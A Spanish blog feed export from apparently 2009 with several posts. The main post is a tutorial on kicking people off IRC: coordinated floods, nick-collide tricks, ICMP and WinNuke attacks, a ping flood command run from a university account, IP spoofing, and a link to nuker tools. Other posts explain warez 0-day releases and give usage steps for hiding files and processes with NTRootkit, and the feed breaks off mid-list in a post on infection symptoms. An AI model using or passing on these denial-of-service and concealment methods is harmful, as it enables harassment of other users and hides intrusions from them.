la información que se proporciona aquí es con fines educativos; en ningún caso debe ser usada salvo en circunstancias excepcionalmente justificadas. Un uso abusivo puede significar una k/g-line totalmente merecida. Yo no me hago responsable de un posible mal uso de esta info.<br /><br /><span style="color: rgb(153, 0, 0);font-size:130%;" ><br /><span style="color: rgb(153, 51, 0); font-weight: bold;">2.- Ataques.</span></span><br />En esta sección entraremos en materia... }:-) Nuestro objetivo: tirar a alguien del server irc.<br /><br /><span style="color: rgb(204, 102, 0);">2.1.- Flood.-</span><br /><br />Los servidores IRC tienen que controlar el tráfico de entrada (el que proviene del exterior) para evitar su congestión. Una de las formas de conseguirlo es no permitir que un cliente le mande más de una determinada cantidad de información en un pequeño intervalo de tiempo; o lo que es lo mismo: la velocidad con que un cliente puede enviar datos al servidor está limitada.<br /><br />Cuando un cliente supera el límite preestablecido por el servidor, éste cierra la conexión con el cliente: lo echa del servidor porque no puede soportar tanto caudal de entrada. El servidor lo "explica" así:<br /><br />[1:59] *** _^TkLaS^_ has quit IRC (Excess Flood)<br /><br />Un flood, en general, no es otra cosa que mandar mucha información en poco tiempo a alguien para intentar que se sature. Se puede floodear una dirección IP, ..., o lo que ahora nos concierne: un servidor de IRC.<br /><br />La manera de aprovechar el flood en nuestro favor consiste en mandar muchas peticiones de información a nuestra víctima, de forma que ésta, al contestar, supere el límite del servidor y éste lo eche. Por ejemplo, si le mandamos muchos /ctcp version's seguidos (requiriendo información sobre el programa cliente que está utilizando) la víctima floodeará al servidor cuando conteste porque mandará muchas veces (tantas como peticiones haya habido) el texto de respuesta al servidor (para que del servidor vaya al cliente que peticionó, i.e., al atacante).<br /><br />En esto del flood juega un papel muy importante el número de peticiones que se reciben en un pequeño intervalo de tiempo. Cuantas más se reciban, más posibilidades hay de que el flood tenga éxito. Por ello no es ninguna tontería mandar peticiones desde varios puntos a la vez, y no desde uno sólo, es decir, varios usuarios (¡que podrían ser una misma persona!) de la red IRC manden peticiones a la víctima todos a la vez en un determinado momento. Si los usuarios (nicks) corresponden a una misma persona (una misma dirección IP) se habla de clones. Por tanto, una posible forma de ataque sería crearnos muchos clones y peticionar a la vez desde todos ellos a la víctima.<br /><br />Pero los servidores también suelen estar preparados para evitar muchos clones (cada clone ocupa, por decirlo de alguna manera, una "linea" de entrada al servidor, y esto consume recursos del mismo). Suele haber un máximo permitido (en el irc hispano es 2) denegándosele el acceso a la red a un tercer clone, o en caso de que éste lo consiguiese expulsándosele del servidor ("matándolo") (el programa servidor revisa periódicamente las IP's conectadas y detecta cuando hay varios usuarios con una misma dirección IP):<br /><br />[1:32] *** _^Virus^_ has quit IRC (Killed (Clones!))<br /><br />¿Cómo provocar un flood con más de 2 clones entonces? La respuesta es simple: en principio no se puede. ¿Entonces? Pues la solución es que varias personas distintas se pongan de acuerdo para atacar a la vez a la víctima. Cada persona podría tener a su vez varios clones. Por ejemplo, si A (atacante) quiere atacar a V (víctima), A se pone de acuerdo con B y C (otras 2 personas atacantes). A su vez supongamos que cada atacante tiene 2 clones: i.1 e i.2 (donde i=A,B,C). Entonces tendremos 6 usuarios (conexiones IRC) distintos atacando a V, que serían A.1, A.2, B.1, B.2, C.1 y C.2. Pero hay un problema: ¿cómo sincronizarse para atacar? ¿Cómo "ponerse de acuerdo" para mandar las peticiones en un determinado momento? Para esto existe lo que se denomina "floodnet" que, como habrá adivinado nuestro ávido lector, es una "red" (asociación) de gente cuyo único objetivo es floodear a alguien. La ventaja que tiene es que la sincronización entre los distintos componentes de la floodnet es automática (lo hacen los scripts) lo cual resuelve el problema anterior. También existe lo que se denomina "botnet" y que es análogo a la floodnet pero usando bots (no confundir con los "de servicio"; estos últimos los ponen los servers de la red irc y no los usuarios) los cuales serán lanzados desde alguna shell Unix (intérprete de comandos en una máquina Unix). Los bots suelen estar prohibidos y cuando se detectan, a lo menos, son expulsados:<br /><br />[1:32] *** Viernes13 has quit IRC (Killed (You are not welcome to this network!))<br /><br /><br />Hoy en día tanto los programas clientes de IRC como los scripts implementan protecciones anti-flood que dificultan enormemente el éxito de un ataque de tipo flood. Por ejemplo, cuando detectan varias peticiones seguidas mandan las respuestas espaciadas en el tiempo (con pausas) y no inmediatamente, con lo cual se evita el flood.<br /><br />También hay técnicas de flood bastante optimizadas (por ejemplo, usando una floodnet) aunque en general un ataque flood no suele ser demasiado eficiente y es más costoso lograr su éxito que con algunas de las técnicas que se describen a continuación.<br /><br /><span style="color: rgb(153, 51, 0);">2.2.- Nick collide.-</span><br /><br />Un "nick collide" ocurre cuando dos personas tienen un mismo nick. En principio esto no debería ser posible (el servidor no deja usar un nick que ya está en uso) pero hay dos situaciones en las que podría darse el caso y que se describen en los dos puntos siguientes.<br /><br />El resultado de un nick collide depende del servidor (ircd). En servidores antiguos (sin protección) el collide se resuelve matando a los dos usuarios con mismo nick (¡ambos!). En otros más inteligentes (con protección) el servidor guarda información acerca de los usuarios y puede saber que usuario tiene el nick con mayor antigüedad (i.e. quién se lo puso antes), matando únicamente al usuario con el nick más reciente (protegiendo al usuario más "veterano").<br /><br />3.2.1.- Split server collide.-<br />Se basa en aprovechar un net-split:<br /><br />- Esperar un split.<br />- Entrar (conectar) al servidor spliteado.<br />- Ponerse como nick el de la víctima.<br />- Esperar a que se deshaga el split.<br /><br />Si todo va bien (el servidor no tiene protección), a la vuelta del split se detectará el collide y se matarán tanto al atacante como a la víctima. Lógicamente nuestro usuario atacante será un clone nuestro, con lo cual no pasa nada si es killeado.<br /><br />3.2.2.- Lag collide.-<br />Consiste en aprovechar el lag de un servidor, o lo que es lo mismo, el retraso en recibir los mensajes de otros servidores. Esta técnica es más efectiva que la anterior, pues funciona en servidores con protección.<br /><br />Los pasos serían los siguientes:<br /><br />- Meter un clone en el servidor lageado.<br />- Esperar a que la víctima cambie de nick (esto lo detectamos desde otro servidor no lageado).<br />- Cambiar rápidamente el nick de nuestro clone y ponerle el que se acaba de poner la víctima (el nuevo).<br />- Esperar al lag. ;)<br /><br />Lo que ocurre es que nuestra orden de cambiar el nick para nuestro clone llega antes al servidor (lageado) que la orden de cambio de nick de la víctima debido a que nuestra orden va directamente de nuestro cliente al servidor lageado mientras que la otra va a través de la red IRC (donde hemos supuesto que se introduce un lag notable). Esto hace que el servidor (lageado) tome a nuestro clone como "dueño" legítimo del nick y mande un kill al otro (la víctima). Esto ocurriría en caso de servidores protegidos; si es no protegido el resultado es que ambos mueren, resultado también aceptable, pues hemos acabado con nuestro objetivo.<br /><br /><span style="color: rgb(204, 102, 0);">2.3.- Nuke.-<br /><br /></span> "Nuke" es la denominación genérica que se le suele dar a cualquier forma de ataque consistente en mandar paquetes arbitrarios a una determinada dirección IP (no es que sea una definición demasiado ortodoxa pero bueno... :)). Realmente el término "nuke" siempre se ha referido al primero de los dos tipos que comentaremos, aunque aquí se ha preferido tomar una definición más amplia de dicha palabra.<br /><br /><span style="color: rgb(255, 102, 0);">2.2.1.- ICMP nuke.-</span><br /><br />El más veterano de los nukes [ :-) ] usa un protocolo subyacente de IP, el ICMP ("Internet Control Message Protocol": parte integral del protocolo de Internet [IP] que resuelve errores y controla los mensajes), para romper una conexión cliente-servidor de IRC (tirar a alguien del server). Para entender cómo funciona hay que hablar un poco de protocolos; es aburrido pero no hay más remedio...<br /><br />Una conexión IRC (cliente-servidor, que es lo que nos interesa) utiliza el protocolo TCP (nivel 4 [transporte] en la torre OSI), el cual se apoya sobre IP (nivel 3 [red]). IP se encarga, entre otras cosas, de hacer el rutado de paquetes ("datagramas IP"), es decir, dado un destino ir enviando los paquetes por el camino apropiado hasta alcanzar el host destino. TCP no ve nada de esto, tan sólo el destino directamente (manda los segmentos TCP directamente al destino), porque IP lo oculta (hace que el rutado sea transparente a TCP). Lógicamente para que un protocolo de nivel superior funcione correctamente, también deberán hacerlo todos los que estén por debajo. En particular, para que nuestra conexión TCP (IRC) se mantenga "viva", IP debe funcionar perfectamente. Y aquí es donde interviene ICMP: se encarga de informar de posibles anomalías que se han producido en el nivel 3 (IP), como por ejemplo, "host unreachable", que significaría que no se ha podido alcanzar el host (el paquete IP ha ido dando saltos ["hops"] de un nodo a otro, hacia el destino, y ha llegado un momento en el que un determinado nodo intermedio no sabía qué hacer con él o ha expirado el tiempo de vida de dicho paquete). En este caso, el paquete que informa del error (ICMP) lo envía el nodo intermedio que se ha dado cuenta del error hacia el "remitente" que lanzó el paquete original (que no se ha podido entregar a su destinatario). Los mensajes ICMP se situan dentro del campo de datos de un datagrama IP y se envían exactamente igual que si fueran datos IP (no son prioritarios). No es objetivo de este escrito tratar más a fondo este tema (para los interesados les aconsejo el libro "Internetworking with TCP/IP, vol I", de Douglas E. Comer, disponible en castellano ya en su tercera edición).<br /><br />Resumiendo: mediante ICMP informamos de que IP ha fallado, y por tanto, también los niveles superiores como TCP.<br /><br />Comprendiendo lo anterior ya se puede intuir en qué consiste el ICMP nuke: mandar mensajes ICMP falseados, engañando al destino, haciéndole creer que el otro extremo ha detectado un error y por tanto, provocando un "cierre" de la comunicación. Vamos a explicar un poco mejor ésto.<br /><br />En una conexión siempre tenemos dos extremos, lo que da dos posibilidades a la hora de engañar, según lo hagamos a uno u otro. En el caso de una conexión IRC, podemos llevar a cabo dos formas de ataque:<br /><br />* Server nuking (nukear al server): los mensajes ICMP se mandan al servidor IRC, haciéndole creer que se ha producido un error al intentar comunicarse con el cliente. Como respuesta a este mensaje el server cierra la conexión que tenía con dicho cliente. El efecto producido es la "expulsión" del usuario por parte del servidor.<br /><br />* Client nuking (nukear al cliente): esta vez se envían los ICMP's al cliente; éste cree que el servidor no está disponible y cierra la conexión (el cliente). El servidor no sabe nada en principio, pero detecta el cierre de conexión por parte del cliente, dando el correspondiente error y cerrando también la conexión por su parte.<br /><br />En teoría las dos fomas de nuking son perfectamente válidas y eficientes, aunque hay que tener ciertas consideraciones en cuenta, como son:<br /><br />- tanto servidor como cliente pueden tener protección anti-nuke y puede ser necesario atacar uno porque el otro esté protegido (ver más adelante).<br />- si atacas a un cliente, éste puede detectar quién le está atacando con un simple analizador de paquetes IP o tracer, y también podría responder con otro ataque de este o cualquier otro tipo (cuidado con quién te metes ;-)).<br />- si atacas al servidor, el cliente no tiene manera de saber quién le ha "atacado" porque los mensajes ICMP no le han llegado a él sino al servidor (ventaja); pero por otro lado, el servidor sí sabe quién ha hecho el ataque y puede resultar en una K/G-Line a dicho usuario por parte del servidor (el usuario podría ser baneado de toda la red de IRC).<br />- los inconvenientes de los dos puntos anteriores pueden ser solventados falseando la dirección origen de los mensajes ICMP que se envían. Esta técnica se conoce como "spoofing" (ver punto 4).<br /><br />Hay diversos tipos de error ICMP que se pueden utilizar a la hora de hacer un nuke. En cuanto a la información práctica de cómo utilizar un nuker (programa "nukeador"), debemos tener en cuenta que además de suministrarle el tipo de error que se desea producir, juegan un papel muy importante los puertos, tanto origen como destino, que se elijan.<br /><br />Una conexión IRC (TCP) queda definida unívocamente por los pares dirección IP origen-puerto origen y dirección IP destino-puerto destino. Estos datos son los que hay que suministrarles al programa nukeador. Puertos típicos del servidor de IRC (será el puerto destino en caso de server nuking o el fuente si se trata de un client nuking) son 6665-9, 4400-6, 7000 y 7777. En realidad cada servidor IRC tiene unos puertos oficialmente reconocidos (que son conocidos públicamente: los podemos leer en el motd ["mensaje del dia"] al entrar en el IRC) y otros que podríamos denominar como privados, y que se usan por ejemplo para las conexiones entre los distintos servidores que forman la red. Un usuario puede estar usando uno de estos puertos "fantasmas" (aunque el servidor también puede limitar el acceso a estos puertos) para esconderse de nukes, puesto que necesitamos conocer este dato para que el nuke sea efectivo.<br /><br />También necesitamos conocer el puerto del cliente, aunque esto es más difícil porque varía mucho (no son fijos como en el caso anterior) dependiendo del sistema operativo que esté corriendo dicho cliente, los puertos que ya tuviera ocupados antes de establecer la conexión IRC, étc. Lo normal es hacer un barrido de estos puertos empezando por el 1024 (hay puertos que por convenio siempre se asignan a determinadas tareas y no se pueden usar arbitrariamente con lo cual no necesitamos barrerlos) y acabando en 4000, por ejemplo, aunque podría ser necesario aumentar este número.<br /><br />Es también muy útil utilizar un "port-scan": programa que va probando los distintos puertos de una dirección IP (destino) dada e informa de la respuesta recibida para cada uno de dichos puertos (así podemos saber, por ejemplo, qué puertos de un servidor están dedicados a aceptar conexiones IRC).<br /><br />A continuación transcribo mensajes típicos de salida de nuestras potenciales víctimas en una sesión típica de IRC:<br /><br />[1:42] *** aRmiTaGe has quit IRC (Read error to aRmiTaGe[ig-183.arrakis.es]: Connection reset by peer)<br />[1:13] *** KoNtRoL has quit IRC (Read error to KoNtRoL[195.76.99.76]: EOF from client)<br />[3:17] *** BrOKeNn has quit IRC (Read error to BrOKeNn[194.224.57.171]: Protocol not available)<br />[5:25] *** Eli has quit IRC (Read error to Eli[info760.jet.es]: Network is unreachable)<br />[5:26] *** Eli has quit IRC (Read error to Eli[info760.jet.es]: Machine is not on the network)<br />[4:20] *** vp has quit IRC (Read error to vp[ia-176.arrakis.es]: Connection refused)<br />[2:41] *** Estrayk has quit IRC (Read error to Estrayk[ctv3011.ctv.es]: No route to host)<br /><br />La protección anti-nuke, a grosso modo, pasa por ignorar los mensajes ICMP que lleguen, aunque ésto ya está limitando el propio funcionamiento del protocolo IP, en el sentido de que ICMP es parte integrante de IP y no se debería inhibir (¿qué ocurriría si llega un mensaje "de verdad" y es ignorado?). Se puede llevar a cabo más o menos "finamente": por ejemplo descartar solo los ICMP's de un tipo y no todos los posibles. Se podría lograr con un firewall (software o hardware encargado de filtrar los paquetes provinientes de la red en base a una reglas previamente definidas) convenientemente configurado.<br /><br /><span style="color: rgb(255, 102, 0);">2.2.2.- OOB nuke.-</span><br /><br />También conocido como 'winnuke', ya que afecta sólo al sistema operativo Windows, en cualquiera de sus "sabores": 3.x, 95 y NT. Se basa en un bug que tiene este SO en la pila de protocolos por el cual el sistema se cuelga ("error de protección general...blah, blah...") cuando recibe un paquete con el flag OOB ("Out of band") activado. El ataque es sencillo: mandar un paquete de este tipo a un puerto (normalmente el 139) de nuestrá víctima (ésta debe estar corriendo Windows, lo cual es muy normal hoy en día). Existen programas ya hechos a los cuales simplemente le das la dirección IP de la víctima y el programa lo hace todo.<br /><br />La forma de protegerse es cerrar los puertos por los que nos puedan atacar (el 139 principalmente) o aplicar algún parche al SO para quitarnos el bug. Otra solución menos recomendable es la que llevan a cabo algunos ISPs (proveedores de Internet), y que consiste en filtrar todos los paquetes dirigidos al puerto 139 (inconveniente: nos están dejando inoperativo ese puerto). Hoy en día es muy popular este bug y normalmente está ampliamente parcheado (aunque siempre habrá algún que otro despistado que no lo tenga instalado }=)).<br /><br />Como hemos dicho, este ataque no sólo consigue echar a la víctima del server sino que además le deja colgado el ordenador (tendrá que hacer un reboot), lo que lo hace especialmente peligroso. La víctima saldrá del IRC con un mensaje de tipo ping-timeout como:<br /><br />[19:56] *** Goku has quit IRC (Ping timeout for Goku[system.tech.arrakis.es])<br /><br /><span style="color: rgb(204, 102, 0);">2.4.- Ping.-</span><br /><br />Algunos los llama también "IP bombs" (bombas IP). Un ping es un tipo de mensaje ICMP que se usa para ver si una máquina se encuentra operativa y accesible. El procedimiento es enviarle un ping a la máquina; ésta lo recibe y contesta. Al recibir la contestación ya sabemos que la máquina vive. Si no se recibe en un plazo dado se considera como no accesible (la máquina podría estar apagada, o todos los "caminos" en la red hacia ella cortados). Además podemos obtener más datos como el grado de saturación de una máquina o red (midiendo el tiempo de respuesta de la máquina, es decir, el tiempo transcurrido desde que una máquina origen envía el ping hasta que recibe la contestación de la otra).<br /><br />La manera de usar esto de forma ofensiva consiste en mandar más pings a un usuario de los que su máquina pueda contestar, saturándole su conexión a Internet. Por tanto se debe de hacer desde un enlace más potente que el que pretendemos atacar.<br /><br />Lo típico es que la víctima esté en su casa y tenga un modem. Por tanto, necesitamos una conexión a inet más rápida que eso. Lo normal es atacar desde una máquina ubicada ya en la red (conectada mediante ATM, FDDI, ...). Por ejemplo, puede valer la cuenta de la Universidad ;-). La forma de hacerlo sería abriéndonos un shell y tecleando:<br /><br /> $ ping -s 32000 <direcc.><br /><br />(la sintaxis puede variar ligeramente según sistema operativo).<br /><br />Los paquetes que se envían al hacer ping son típicamente muy pequeños. Con el modificador -s estamos forzando un nuevo tamaño (32000 bytes es aceptable; también podeis probar con 64000).<br /><br />Pensad: un modem de 28.8 tardará unos 18 segs. en recibir 64 Kbytes (sin considerar compresión), mientras que desde nuestra shell lo hemos mandado en ¡¡décimas de segundo!! Si consideramos además que el comando ping manda más de un paquete (los que queramos) ... ¡boom! Tendréis el modem de vuestra víctima trabajando a toda pastilla para nada y fastidiándole todo lo que esté haciendo. En particular, le estropearéis su conexión al IRC: en el mejor de los casos la víctima tendrá un lag horroroso y el peor será expulsada del servidor por "ping time-out".<br /><br /><span style="color: rgb(204, 102, 0);">2.5.- Ssping.-</span><br /><br />Nos encontramos ante otro bug parecido al del OOB, que afecta a Win95 y NT (aunque no a todas las configuraciones), y cuya idea es que el "maravilloso" Windows "se lía" a la hora de reconstruir paquetes que le han llegado fragmentados y acaba con un cuelgue del ordenador. El ataque consiste en precisamente mandar esos paquetes fragmentados a la víctima.<br /><br />Un bug de este tipo es viejo conocido de los sistemas UNIX (el ataque se conocía como "ping of death"); pero la novedad es que ahora lo sufren los Windows. Aunque son cosas técnicamente diferentes, la forma de proceder a la hora de atacar es análoga a OOB: solo hay que saber la dirección IP de la víctima y ¡boom!: le dejamos colgado el ordenador.<br /><br />La solución pasa por parchear el S.O. En particular, este bug parece que no afecta al Trumpet Winsock así que si lo usais estareis protegidos.<br /><br /><br /><span style="color: rgb(204, 102, 0);"> 3.- Spoofing.-</span><br /><br />Esta técnica no es un ataque en sí pero permite mejorar y perfeccionar cualquier ataque (de los anteriores, por ejemplo). También puede ser la base de algún ataque, como ocurre con el IP Spoofing que los hackers suelen emplear (me desviaría del tema de este escrito si siguiese escribiendo...).<br /><br />Se trata de "spoofear" (=falsear) la dirección IP de origen de los paquetes que se mandan a la víctima, de forma que ésta crea que el origen de dichos paquetes es otro (el que nosotros le indiquemos). De esta forma protegemos nuestro anonimato, y en general podemos llevar a cabo cualquier acción que se nos pueda ocurrir y que se derive de una falsa dirección source (origen). Por ejemplo, podemos nukear a alguien, con la dirección fuente de otro, haciendo creer a la víctima (si ésta tiene un analizador de paquetes o algo parecido) que es el otro el que le está atacando }:-).<br /><br />El spoofing es (o podría ser) una funcionalidad más del programa de ataque (del nuker, del ping, ...). Como consiste en manejar IP desde un muy bajo nivel en muchos casos se requieren privilegios especiales. Por ejemplo, en el caso de máquinas Unix, se necesita abrir "raw sockets" y ésto requiere de privilegios de superusuario (root).<br /><br /><br /><span style="color: rgb(204, 102, 0);">4.- Resources.<br /><br /></span> Este apartado está dedicado, brevemente, a los distintos programas disponibles y útiles a nuestra causa :-).<br /><br />Por ahora sólo incluyo la siguiente URL: http://www.7thsphere.com/virus. Allí podrás encontrar toda clase de utilidades para Windows y Linux: programas nukeadores, port-scanners, étc...<br /><br /><br /><br />También me gustaría recordar que el IRC no es un campo de batalla, y que no se debe atacar a la gente así porque así, salvo "en defensa propia" y pocos casos más justificados. O:-) En cualquier caso un ataque nunca está justificado desde el punto de vista de los ircops, así que cuidado con las K/G-lines ;-)<br /><br />Por último, decir que este artículo es la primera versión y que pudiera contener numerosos errores así como algún que otro "punto negro". Se agradecería toda clase de comentarios y sugerencias para mejorar el documento: bug reports, asuntos que creáis no están bien explicados, temas que faltan y se deberían incluir, ..., y en definitiva todo lo que os gustaría que se incluyese en el documento. También se aceptan O-lines ;-)<br /><br /><br /><br /></direcc.></span>fuente:<span style="color: rgb(0, 0, 0);"> roman@deathsdoor.com</span>Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-18503976777621310002009-11-27T15:32:00.000+01:002009-11-27T15:35:33.792+01:00QUE ES UN 0-DAY ?<span property="dc:content">0Day es la denominación que se le tienen las releases (releases son los lanzamientos, osea cuando ponen un programa crackeado o en su defecto solo el crack para un programa disponible para descargar.<br /><br />Estas releases 0day o 0-day (cero día) significa que son programas que son crackeados el mismo día en que son sacados por los autores, o son cracks o programas que recién han salido a la luz. 0day o 0-day significa lo último disponible, lo más nuevo, calentito calentito, recién sacado del horno... se entiende no ?.<br /><br />Los grupos de crackers distribuyen sus releases 0-Day, que luego de pasar por los servidores privados de cada grupo son distribuidos en USENET en los newsgroups 0day.games , 0day.warez, 0day.appz, 0day.ibm.pc, etc y que luego son subidos en servidores archivos para descarga como Rapidshare, Megaupload, etc y que luego se distribuyen por P2P.<br /><br />Pueden verificar las releases 0-day buscando los titulos listados en: http://www.binsearch.info<br /><br />Características de Usenet<br /><br /></span><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha_f_D3EHbHmyESjwiyOxu5pGvYGMvusWaIN0bwjpG6oP0FY1ESPztB-6C02IRILl6Me3GFK9VcISsfKYe0GDZUy3Bt3UezKPjFF6qN4GpwCCAqHq2cdx9bohFfBf3bh_PWHFH_2wCcsc/s1600/245px-Usenet_servers_and_clients.svg.png"><img style="cursor: pointer; width: 181px; height: 166px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha_f_D3EHbHmyESjwiyOxu5pGvYGMvusWaIN0bwjpG6oP0FY1ESPztB-6C02IRILl6Me3GFK9VcISsfKYe0GDZUy3Bt3UezKPjFF6qN4GpwCCAqHq2cdx9bohFfBf3bh_PWHFH_2wCcsc/s320/245px-Usenet_servers_and_clients.svg.png" alt="" id="BLOGGER_PHOTO_ID_5408791842920462034" border="0" /></a><br /><br />Conexiones entre usuarios y servidores en un sistema Usenet.<br /><br /><span property="dc:content"><br />Usenet es uno de los sistemas de comunicaciones más antiguos. Permite a cualquier persona, intercambiar mensajes en foros públicos, generalmente relacionados a un tema específico (determinado por el grupo donde se publican-leen los mensajes).<br /><br />Cuando un usuario se suscribe a un grupo de noticias, la aplicación cliente de noticias se encarga de descargar todos los mensajes disponibles en un servidor y los ordena. Cada servidor determina el tiempo que durará un mensaje almacenado.<br /><br />Actualmente los grupos de noticias de usenet no sólo se usan para intercambiar texto, sino que son una fuente inagotable de todo tipo de contenidos: software, videos, imágenes, documentos, música, etc.<br /><br />Si quieren indagar más sobre USENET:<br /><br />http://es.wikipedia.org/wiki/Usenet</span>Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-64964581620961228072009-11-26T09:39:00.000+01:002009-11-26T10:08:44.156+01:00Rootkit sin defensa posible?Un rootkit es una herramienta, o un grupo de ellas que tiene como finalidad esconderse a sí misma y esconder otros programas, procesos, archivos, directorios, claves de registro, y puertos que permiten al intruso mantener el acceso a un sistema para remotamente comandar acciones o extraer información sensible. Existen rootkits para una amplia variedad de sistemas operativos, como GNU/Linux, Solaris o Microsoft Windows.<br /><br />fuente : wikipedia<br /><br />Para el sistema operativo de windows esta el NTROOT,NTRootkit no es exactamente un virus. Se trata de una herramienta que algunos hackers utilizan para que el usuario del ordenador afectado no se percate de sus actuaciones.<br /><br />Es el propio hacker quien, una vez que han conseguido acceder a otra máquina, instala en el sistema a NTRootkit.<br /><br />NTRootkit sólo puede funcionar en ordenadores que tengan instalado el sistema operativo Windows NT, 2000 o XP. En ellos puede provocar efectos distintos, puesto que existen distintas variantes de NTRootkit que son capaces de llevar a cabo actuaciones diferentes.Para poder usarlo casi siempre se tendra que compilar es raro encontrar el .exe.<br /><br /><span style="color: rgb(255, 0, 0);">OS PONGO UNA PEQUEÑA EXPLICACION </span><br /><br />La forma de usarlo seria , una vez descargado ,debes buscar el directorio donde se ha descargado (normalmente en c,) abre la consola y escribe su directorio hay debes buscar deploy.exe ejecutalo y ya esta.<br /><br />Para probarlo su funcionamiento ,crea un directorio el que quieras (ejem. musica) mete un archivo de texto.txt renombralo a _root_ musica( todo achivo renombado a _roo desaparece) haz un dir y veras que ese achivo a desparecido.<br /><br />Para oculta los procesos,o en lineas de registro es lo mismo debes renombrar _root_ lo que sea.exe<br />se ocultara hasta en el mataprocesos(Control+ alt+ supr).<br /><br />Para activarlo pones en consola net start _root_<br />Para desactivarlo pones en consola net stop _root_<br /><br />PD:se cree que los windows de nuestro querido bill puertas bienen instalados los rootkits<br />verdad o mentira?<span style="font-size:100%;"><br /><br /></span><strong><span style="font-family:Arial;font-size:85%;color:#0000a0;"><span style="color: rgb(255, 0, 0);font-size:100%;" >ANTI-ROOTKIT LICENCIA GRATUITA (FREEWARE)</span><br /><br /></span></strong><span style="font-family:Arial;font-size:85%;"><b><span style="color:#0000a0;"><u>F-Secure BlackLight Rootkit Eliminator 2.2.1092:</u></span></b> Detecta y elimina ‘objetos’ ocultos, tanto a la vista del usuario como a las utilidades de seguridad habituales. Esta utilidad es muy sencilla, basta con ejecutarla sin necesidad de instalación e indicarle que inicie el escaneo. Sus virtudes son que sólo se muestra cuando realmente ha encontrado un rootkit, su velocidad de análisis y la posibilidad de eliminar rootkits activos.<br /><br /></span><span style="font-family:Arial;font-size:85%;"><b><span style="color:#0000a0;"><u>Lavasoft ARIES Rootkit Remover 1.0:</u></span></b> Detecta y elimina de su computador el famoso rootkit puesto por <span style="color:#ff0000;"><b> Sony</b></span> en sus CDS para para evitar copias ilegales, además, este programa evita que se vuelva a infectar si inserta de nuevo dicho CD.<br /><br /></span><span style="font-family:Arial;font-size:85%;"><b><span style="color:#0000a0;"><u>Norman Malware Cleaner 2009.04.22:</u></span></b> <span id="intelliTXT">Es una herramienta que ofrece protección para impedir que los "malwares" entren a su sistema y permite erradicarlos una vez producida la infección. La lista de elementos reconocidos no es muy elevada ya que Norman Malware Cleaner es más una herramienta específica para eliminar determinados rootkits y malware, eliminando las variantes reconocidas</span>.<br /><br /></span><span style="font-family:Arial;font-size:85%;"><b><span style="color:#0000a0;"><u>Sophos Anti-Rootkit 1.10:</u></span></b> Esta sencilla herramienta es capaz de localizar y eliminar cualquier rootkit que se haya escondido en tu sistema, analizando para ello todas tus unidades de disco, procesos activos y Registro de Windows.<br /><br /></span><span style="color: rgb(204, 0, 0);font-size:100%;" ><strong><span style="font-family:Arial;">ANTI-ROOTKIT LICENCIA COMERCIAL (EVALUACIÓN)</span></strong></span><br /><br /><span style="font-family:Arial;font-size:85%;"><b><span style="color:#0000a0;"><u>RegRun Security Suite 4.60:</u></span></b> Completa suite de seguridad diseñada para detectar y eliminar virus, troyanos, spyware e incluso los nuevos y resistentes <a href="http://www.seguridadpc.net/rootkits.htm" target="_blank">rootkits</a>. Esta suite no sustituye a su antivirus, es un buen complemento que incluye más de una treintena de funciones/utilidades para ‘vigilar’ a fondo tu sistema; optimizar el inicio, capturar rootkits, proteger los archivos esenciales del sistema, monitorizar las conexiones a Internet, entre otros.<br /><br /></span><span style="font-family:Arial;font-size:85%;"><b><u><span style="color:#0000a0;">UnHackMe 4.5 Beta:</span></u></b> Sencilla y rápida utilidad para detectar rootkits e intentar eliminarlos de su sistema. Esta utilidad es muy simple, lo ejecuta y pulse sobre: “Check me now!”. Casi al momento vera si su computador está infectado o no. También incluye un monitorizador que, cada minuto (configurable), comprobará si se ha colado alguno de estos peligrosos rootkits en su sistema.<br /><br /><br /></span>Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com0tag:blogger.com,1999:blog-6882397234957178715.post-28721589954287472152009-11-25T13:17:00.000+01:002009-11-25T13:19:23.830+01:00Síntomas o ¿Cómo saber si estoy infectado???* Le aparecen Ventanas de publicidad continuamente<br /><br /> * Lentitud del Ordenador<br /><br /> * Facturas de teléfono elevadas<br /><br /> * Secuestro del navegador de Internet<br /><br /> * Aparición de barra de búsquedas de diferentes sitios en el navegador<br /><br /> * Aparición de diferentes íconos en la barra de tareas del navegador<br /><br /> * La casilla de correo posee infinidades de mensajes que no son deseados<br /><br /> * El sistema operativo se torna muy inestable<br /><br /> * La conexión a Internet demuestra lentitud y poca transferencia de datos<br /><br /><span style="font-size: 11pt; line-height: 1.3em;"><b>Causas o ¿Por qué a mi???</b></span><br /><br /> * ¿Recientemente ha descargado música por Internet?<br /><br /> * ¿Ha utilizado programas gratuitos?<br /><br /> * ¿Ha entrado en páginas Web no fiables?<br /><br /> * ¿Ha intercambiado datos con algún usuario desconocido?<br /><br /> * ¿Ha utilizado programas p2p para la descarga de archivos?<br /><br /> * ¿Ha abierto correos electrónicos de procedencia dudosa y descargado los archivos adjuntos?<br /><br /> * ¿Posee algún medio de protección contra esto?<br /><br /> * ¿Ha ingresado en sitios donde exigen su numeración telefónica?<br /><br /><span style="font-size: 12pt; line-height: 1.3em;"><b>Efectos o ¿Qué me puede pasar?</b></span><br /><br /> * Imposibilidad de navegar por Internet.<br /><br /> * El Ordenador se le ralentiza hasta quedar totalmente bloqueado.<br /><br /> * Robos bancarios y de contraseñas secretas<br /><br /> * Transferencia nula de información vía Internet<br /><br /> * La facturación del teléfono puede llegar a ser 4 veces más de lo que paga<br /><br /> * Robo de información sobre la tarjeta de crédito<br /><br /> * Obtención de documentos privados e individuales o empresariales<br /><br /> * Extracción de Fotografías o diseños privados e individuales o empresariales<br /><br /> * Extracción de las listas de contactos del correo electrónico<br /><br /> * Utilización de su ordenador con fines ilegales, como por ejemplo, el hacking<br /><br /> * Filtraciones por medio de la red interna hacia las terminales<br /><br /><span style="font-size: 12pt; line-height: 1.3em;"><b>Medidas de prevención ¿Qué puedo hacer?</b></span><br /><br /> * Descargar archivos siempre de servidores Fiables<br /><br /> * Asegurarse que detrás de las aplicaciones hay una empresa real y fiable.<br /><br /> * Tener un buen Antispyware que le proteja<br /><br /> * Pedir el consejo de un experto (ir a análisis de un experto)<br /><br /> * No navegar en sitios donde se piden números 